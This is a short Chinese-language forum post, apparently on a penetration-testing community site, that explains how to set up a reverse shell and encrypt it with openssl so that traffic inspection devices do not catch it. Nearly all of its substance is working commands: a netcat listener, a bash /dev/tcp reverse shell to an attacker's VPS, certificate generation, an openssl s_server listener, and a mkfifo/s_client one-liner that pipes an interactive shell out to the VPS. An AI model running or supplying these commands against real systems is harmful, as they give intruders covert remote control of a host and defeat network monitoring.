找回密码
 注册

QQ登录

只需一步,快速开始

在我们实际的渗透测试过程中,总是有各种各样的流量审查设备挡住我们通往system的道路,尤其是在反弹shell的时候,明文传输的shell总是容易断,那么本文介绍一种利用openssl反弹流量加密的shell来绕过流量审查设备。

常规bash反弹
vps执行 nc -lvvp 4444

目标主机执行 bash -i >& /dev/tcp/172.16.1.1/4444 0>&1



流量明文传输,很容易被拦截。

openssl加密传输
第一步,在vps上生成SSL证书的公钥/私钥对

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

第二步,在VPS监听反弹shell

openssl s_server -quiet -key key.pem -cert cert.pem -port 4433

第三步,在目标上用openssl加密反弹shell的流量

mkfifo /tmp/s;/bin/bash -i < /tmp/s 2>&1|openssl s_client -quiet -connect vps:443 > /tmp/s;rm /tmp/s

20190826132310

流量已经被加密。
我知道答案 本帖寻求最佳答案回答被采纳后将获得系统奖励10 金币 , 目前已有0人回答

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?注册

x
分享至 : QQ空间
收藏

0 个回复

您需要登录后才可以回帖 登录 | 注册